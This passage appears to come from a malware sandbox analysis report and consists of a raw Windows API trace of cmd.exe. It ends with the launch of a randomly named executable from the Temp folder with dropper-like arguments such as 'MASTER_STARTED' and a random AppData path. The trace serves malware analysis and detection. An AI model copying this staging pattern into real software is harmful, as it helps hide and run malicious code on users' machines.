lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.303] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.303] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.304] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.304] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.304] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.305] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.305] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.305] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.305] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.305] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.305] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.305] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.305] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.324] _close (_FileHandle=4) returned 0 [0094.324] FindNextFileW (in: hFindFile=0x300f68, lpFindFileData=0x26f4d8 | out: lpFindFileData=0x26f4d8) returned 0 [0094.324] GetLastError () returned 0x12 [0094.324] FindClose (in: hFindFile=0x300f68 | out: hFindFile=0x300f68) returned 1 [0094.324] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0094.406] _close (_FileHandle=3) returned 0 [0094.407] GetConsoleTitleW (in: lpConsoleTitle=0x26f974, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.407] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe\"")) returned 0xffffffff [0094.407] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0094.407] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0094.407] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0094.407] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0094.407] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0094.407] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0094.407] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0094.407] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0094.407] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0094.407] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0094.407] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0094.407] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0094.407] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0094.407] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0094.407] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0094.407] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0094.407] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0094.407] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0094.407] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0094.407] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0094.407] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0094.407] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0094.408] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0094.408] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0094.408] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0094.408] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0094.408] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0094.408] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0094.408] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0094.408] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0094.408] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0094.408] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0094.408] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0094.408] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0094.408] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0094.408] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0094.408] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0094.408] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0094.408] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0094.408] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0094.408] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0094.408] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0094.408] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0094.408] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0094.408] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0094.408] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0094.408] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0094.408] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0094.408] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0094.408] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0094.408] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0094.408] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0094.408] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0094.408] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0094.408] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0094.408] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0094.408] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0094.408] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0094.408] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0094.409] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0094.409] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0094.409] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0094.409] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0094.409] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0094.409] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0094.409] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0094.409] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0094.409] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0094.409] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0094.409] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0094.409] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0094.409] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0094.409] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0094.409] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0094.409] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0094.409] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0094.409] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0094.409] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0094.409] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0094.409] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0094.409] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0094.409] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0094.409] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0094.409] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0094.409] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0094.409] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0094.409] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0094.409] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0094.410] SetErrorMode (uMode=0x0) returned 0x0 [0094.410] SetErrorMode (uMode=0x1) returned 0x0 [0094.410] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x3104c8, lpFilePart=0x26f494 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x26f494*="Temp") returned 0x23 [0094.410] SetErrorMode (uMode=0x0) returned 0x1 [0094.410] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0094.410] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.414] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.414] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", fInfoLevelId=0x1, lpFindFileData=0x26f230, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f230) returned 0x312488 [0094.414] FindClose (in: hFindFile=0x312488 | out: hFindFile=0x312488) returned 1 [0094.414] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0094.414] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0094.414] GetConsoleTitleW (in: lpConsoleTitle=0x26f708, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.415] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f590, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f658 | out: lpAttributeList=0x26f590, lpSize=0x26f658) returned 1 [0094.415] UpdateProcThreadAttribute (in: lpAttributeList=0x26f590, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f650, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f590, lpPreviousValue=0x0) returned 1 [0094.415] GetStartupInfoW (in: lpStartupInfo=0x26f54c | out: lpStartupInfo=0x26f54c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0094.415] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0094.416] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0094.416] lstrcmpW (lpString1="\\NhsgKr2p.exe", lpString2="\\XCOPY.EXE") returned -1 [0094.417] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f5ec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f638 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", lpProcessInformation=0x26f638*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb4c, dwThreadId=0xb50)) returned 1 [0094.980] CloseHandle (hObject=0x4c) returned 1 [0094.980] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0094.980] GetEnvironmentStringsW () returned 0x312cf8* [0094.980] FreeEnvironmentStringsW (penv=0x312cf8) returned 1 [0094.980] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0097.395] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f52c | out: lpExitCode=0x26f52c*=0x0) returned 1 [0097.395] CloseHandle (hObject=0x50) returned 1 [0097.395] _vsnwprintf (in: _Buffer=0x26f674, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f538 | out: _Buffer="00000000") returned 8 [0097.395] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0097.395] GetEnvironmentStringsW () returned 0x3124a8* [0097.395] FreeEnvironmentStringsW (penv=0x3124a8) returned 1 [0097.395] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0097.395] GetEnvironmentStringsW () returned 0x3124a8* [0097.396] FreeEnvironmentStringsW (penv=0x3124a8) returned 1 [0097.396] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f590 | out: lpAttributeList=0x26f590) [0097.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0097.396] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0097.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0097.396] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0097.396] _get_osfhandle (_FileHandle=0) returned 0x3 [0097.396] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0097.397] SetConsoleInputExeNameW () returned 0x1 [0097.397] GetConsoleOutputCP () returned 0x1b5 [0097.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0097.397] SetThreadUILanguage (LangId=0x0) returned 0x409 [0097.397] exit (_Code=0) Process: id = "8" image_name = "cnuu8vyt.exe" filename = 